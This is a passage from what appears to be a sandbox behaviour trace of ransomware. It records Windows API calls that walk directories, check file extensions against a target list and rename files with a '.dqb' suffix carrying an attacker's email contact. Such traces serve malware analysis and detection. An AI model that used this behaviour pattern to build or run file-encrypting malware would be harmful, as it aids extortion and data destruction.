1 [0268.867] FindNextFileW (in: hFindFile=0x659180, lpFindFileData=0x324fa84 | out: lpFindFileData=0x324fa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0271.200] FindNextFileW (in: hFindFile=0x41803b0, lpFindFileData=0x324f310 | out: lpFindFileData=0x324f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0271.200] FindNextFileW (in: hFindFile=0x41803b0, lpFindFileData=0x324f310 | out: lpFindFileData=0x324f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x43a14d90, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x43a14d90, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0271.200] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x4193078 [0271.200] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*", lpFindFileData=0x324f094 | out: lpFindFileData=0x324f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x43a14d90, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x43a14d90, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x41804f0 [0271.201] FindNextFileW (in: hFindFile=0x41804f0, lpFindFileData=0x324f094 | out: lpFindFileData=0x324f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x43a14d90, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x43a14d90, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0271.201] FindNextFileW (in: hFindFile=0x41804f0, lpFindFileData=0x324f094 | out: lpFindFileData=0x324f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0271.202] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x425bfc0 [0271.202] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*", lpFindFileData=0x324ee18 | out: lpFindFileData=0x324ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4180530 [0271.202] FindNextFileW (in: hFindFile=0x4180530, lpFindFileData=0x324ee18 | out: lpFindFileData=0x324ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0271.202] FindNextFileW (in: hFindFile=0x4180530, lpFindFileData=0x324ee18 | out: lpFindFileData=0x324ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd5024ea0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x2760, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOInstallerUI.dll", cAlternateFileName="VSTOIN~1.DLL")) returned 1 [0271.203] FindClose (in: hFindFile=0x4180530 | out: hFindFile=0x4180530) returned 1 [0271.203] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x425bfc0 | out: hHeap=0x5e0000) returned 1 [0271.203] FindNextFileW (in: hFindFile=0x41804f0, lpFindFileData=0x324f094 | out: lpFindFileData=0x324f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43a14d90, ftCreationTime.dwHighDateTime=0x1d5351d, ftLastAccessTime.dwLowDateTime=0x43a14d90, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x43a3aef0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x3cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOInstaller.config.id-9C354B42.[btcdecoding@qq.com].dqb", cAlternateFileName="VSTOIN~1.DQB")) returned 1 Thread: id = 99 os_tid = 0x67c [0268.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3a80088 [0268.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3a90090 [0268.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634fd0 [0268.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x661960 [0268.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634fb8 [0268.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x3e30020 [0268.870] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634c88 [0268.870] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634c88, Size=0x20) returned 0x65b800 [0268.870] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634c88 [0268.870] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634c88, Size=0x20) returned 0x65b828 [0268.870] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0268.870] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0268.870] Wow64DisableWow64FsRedirection (in: OldValue=0x338ff58 | out: OldValue=0x338ff58*=0x0) returned 1 [0268.870] lstrlenW (lpString="kernel32.dll") returned 12 [0268.870] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b800 | out: hHeap=0x5e0000) returned 1 [0268.870] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0268.870] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b828 | out: hHeap=0x5e0000) returned 1 [0268.870] Sleep (dwMilliseconds=0x64) [0269.213] lstrcmpiW (lpString1=".LOG1", lpString2=".dqb") returned 1 [0269.213] lstrlenW (lpString="BCD.LOG1") returned 8 [0269.213] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.272] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x338ff1c | out: lpFileSize=0x338ff1c*=0) returned 1 [0269.272] CloseHandle (hObject=0x1f0) returned 1 [0269.272] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0269.272] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0269.272] lstrlenW (lpString=".doc") returned 4 [0269.272] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0269.272] lstrlenW (lpString=".docx") returned 5 [0269.273] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0269.273] lstrlenW (lpString=".pdf") returned 4 [0269.273] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0269.273] lstrlenW (lpString=".xls") returned 4 [0269.273] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0269.273] lstrlenW (lpString=".xlsx") returned 5 [0269.273] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0269.273] lstrlenW (lpString=".ppt") returned 4 [0269.273] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0269.273] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0269.273] lstrlenW (lpString=".zip") returned 4 [0269.273] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0269.273] lstrlenW (lpString=".rar") returned 4 [0269.273] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0269.273] lstrlenW (lpString=".bz2") returned 4 [0269.273] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0269.273] lstrlenW (lpString=".7z") returned 3 [0269.273] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0269.273] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0269.273] lstrlenW (lpString=".dbf") returned 4 [0269.273] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0269.273] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0269.273] lstrlenW (lpString=".1cd") returned 4 [0269.273] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0269.273] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0269.273] lstrlenW (lpString=".jpg") returned 4 [0269.273] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0269.273] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0269.273] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0269.273] lstrlenW (lpString=".doc") returned 4 [0269.273] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0269.273] lstrlenW (lpString=".docx") returned 5 [0269.274] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0269.274] lstrlenW (lpString=".pdf") returned 4 [0269.274] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0269.274] lstrlenW (lpString=".xls") returned 4 [0269.274] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0269.274] lstrlenW (lpString=".xlsx") returned 5 [0269.274] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0269.274] lstrlenW (lpString=".ppt") returned 4 [0269.274] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0269.274] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0269.274] lstrlenW (lpString=".zip") returned 4 [0269.274] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0269.274] lstrlenW (lpString=".rar") returned 4 [0269.274] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0269.274] lstrlenW (lpString=".bz2") returned 4 [0269.274] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0269.274] lstrlenW (lpString=".7z") returned 3 [0269.274] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0269.274] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0269.274] lstrlenW (lpString=".dbf") returned 4 [0269.274] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0269.274] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0269.274] lstrlenW (lpString=".1cd") returned 4 [0269.274] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0269.274] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0269.274] lstrlenW (lpString=".jpg") returned 4 [0269.274] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0269.274] lstrcmpiW (lpString1=".ttf", lpString2=".dqb") returned 1 [0269.274] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0269.275] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0269.359] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x338ff1c | out: lpFileSize=0x338ff1c*=1984228) returned 1 [0269.359] CloseHandle (hObject=0x1f4) returned 1 [0269.359] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0269.359] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.359] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.360] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0269.360] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0269.360] lstrlenW (lpString=".doc") returned 4 [0269.360] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0269.360] lstrlenW (lpString=".docx") returned 5 [0269.360] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0269.360] lstrlenW (lpString=".pdf") returned 4 [0269.360] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0269.360] lstrlenW (lpString=".xls") returned 4 [0269.360] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0269.360] lstrlenW (lpString=".xlsx") returned 5 [0269.360] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0269.360] lstrlenW (lpString=".ppt") returned 4 [0269.360] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0269.360] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0269.360] lstrlenW (lpString=".zip") returned 4 [0269.360] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0269.360] lstrlenW (lpString=".rar") returned 4 [0269.360] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0269.360] lstrlenW (lpString=".bz2") returned 4 [0269.360] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0269.360] lstrlenW (lpString=".7z") returned 3 [0269.360] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0269.360] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0269.360] lstrlenW (lpString=".dbf") returned 4 [0269.360] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0269.360] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0269.360] lstrlenW (lpString=".1cd") returned 4 [0269.360] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0269.360] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0269.360] lstrlenW (lpString=".jpg") returned 4 [0269.360] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0269.361] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0269.361] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0269.361] lstrlenW (lpString=".doc") returned 4 [0269.361] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0269.361] lstrlenW (lpString=".docx") returned 5 [0269.361] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0269.361] lstrlenW (lpString=".pdf") returned 4 [0269.361] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0269.361] lstrlenW (lpString=".xls") returned 4 [0269.361] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0269.361] lstrlenW (lpString=".xlsx") returned 5 [0269.361] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0269.361] lstrlenW (lpString=".ppt") returned 4 [0269.361] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0269.361] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0269.361] lstrlenW (lpString=".zip") returned 4 [0269.361] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0269.361] lstrlenW (lpString=".rar") returned 4 [0269.361] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0269.361] lstrlenW (lpString=".bz2") returned 4 [0269.361] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0269.361] lstrlenW (lpString=".7z") returned 3 [0269.361] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0269.361] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0269.361] lstrlenW (lpString=".dbf") returned 4 [0269.361] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0269.361] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0269.361] lstrlenW (lpString=".1cd") returned 4 [0269.361] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0269.361] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0269.361] lstrlenW (lpString=".jpg") returned 4 [0269.361] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0269.362] Sleep (dwMilliseconds=0x64) [0269.752] Sleep (dwMilliseconds=0x64) [0270.133] lstrcmpiW (lpString1=".INF", lpString2=".dqb") returned 1 [0270.133] lstrlenW (lpString="COMPASS.INF") returned 11 [0270.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0270.484] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x338ff1c | out: lpFileSize=0x338ff1c*=486) returned 1 [0270.484] CloseHandle (hObject=0x318) returned 1 [0270.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf")) returned 0x20 [0270.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.485] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.485] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 75 [0270.485] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 75 [0270.485] lstrlenW (lpString=".doc") returned 4 [0270.485] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0270.485] lstrlenW (lpString=".docx") returned 5 [0270.485] lstrcmpiW (lpString1=".docx", lpString2="S.INF") returned -1 [0270.485] lstrlenW (lpString=".pdf") returned 4 [0270.485] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0270.485] lstrlenW (lpString=".xls") returned 4 [0270.485] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0270.485] lstrlenW (lpString=".xlsx") returned 5 [0270.485] lstrcmpiW (lpString1=".xlsx", lpString2="S.INF") returned -1 [0270.485] lstrlenW (lpString=".ppt") returned 4 [0270.485] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0270.485] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 75 [0270.485] lstrlenW (lpString=".zip") returned 4 [0270.485] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0270.485] lstrlenW (lpString=".rar") returned 4 [0270.485] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0270.485] lstrlenW (lpString=".bz2") returned 4 [0270.485] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0270.485] lstrlenW (lpString=".7z") returned 3 [0270.485] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0270.485] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 75 [0270.485] lstrlenW (lpString=".dbf") returned 4 [0270.485] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0270.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 75 [0270.486] lstrlenW (lpString=".1cd") returned 4 [0270.486] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0270.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 75 [0270.486] lstrlenW (lpString=".jpg") returned 4 [0270.486] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0270.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 75 [0270.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 75 [0270.486] lstrlenW (lpString=".doc") returned 4 [0270.486] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0270.486] lstrlenW (lpString=".docx") returned 5 [0270.486] lstrcmpiW (lpString1=".docx", lpString2="S.INF") returned -1 [0270.486] lstrlenW (lpString=".pdf") returned 4 [0270.486] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0270.486] lstrlenW (lpString=".xls") returned 4 [0270.486] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0270.486] lstrlenW (lpString=".xlsx") returned 5 [0270.486] lstrcmpiW (lpString1=".xlsx", lpString2="S.INF") returned -1 [0270.486] lstrlenW (lpString=".ppt") returned 4 [0270.486] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0270.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 75 [0270.486] lstrlenW (lpString=".zip") returned 4 [0270.486] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0270.486] lstrlenW (lpString=".rar") returned 4 [0270.486] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0270.486] lstrlenW (lpString=".bz2") returned 4 [0270.486] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0270.486] lstrlenW (lpString=".7z") returned 3 [0270.486] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0270.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 75 [0270.486] lstrlenW (lpString=".dbf") returned 4 [0270.486] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0270.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 75 [0270.487] lstrlenW (lpString=".1cd") returned 4 [0270.487] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0270.487] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 75 [0270.487] lstrlenW (lpString=".jpg") returned 4 [0270.487] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0270.487] Sleep (dwMilliseconds=0x64) [0271.055] lstrcmpiW (lpString1=".INF", lpString2=".dqb") returned 1 [0271.055] lstrlenW (lpString="RICEPAPR.INF") returned 12 [0271.055] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0271.268] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x338ff1c | out: lpFileSize=0x338ff1c*=569) returned 1 [0271.269] CloseHandle (hObject=0x318) returned 1 [0271.271] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.inf")) returned 0x20 [0271.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.inf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0271.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0271.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 77 [0271.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 77 [0271.285] lstrlenW (lpString=".doc") returned 4 [0271.287] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0271.287] lstrlenW (lpString=".docx") returned 5 [0271.291] lstrcmpiW (lpString1=".docx", lpString2="R.INF") returned -1 [0271.318] lstrlenW (lpString=".pdf") returned 4 [0271.318] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0271.320] lstrlenW (lpString=".xls") returned 4 [0271.322] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0271.324] lstrlenW (lpString=".xlsx") returned 5 [0271.327] lstrcmpiW (lpString1=".xlsx", lpString2="R.INF") returned -1 [0271.332] lstrlenW (lpString=".ppt") returned 4 [0271.333] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0271.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 